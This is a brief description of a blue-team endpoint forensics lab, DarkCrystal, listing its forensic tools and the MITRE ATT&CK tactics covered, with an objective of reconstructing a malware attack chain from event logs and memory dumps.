DarkCrystal is a blue team lab that falls under the Endpoint Forensics category and will cover the following subjects: Event Log Explorer, Timeline Explorer, MemProcFS, Volatility 3, Execution, Defense Evasion, Discovery, Command and Control.
Learning Objectives
Reconstruct a multi-stage malware attack chain by analyzing Windows event logs with EvtxECmd and memory dumps with Volatility to identify LOLBins and C2 communications.
Categories: Endpoint Forensics.
MITRE ATT&CK Tactics: Execution, Defense Evasion, Discovery, Command and Control.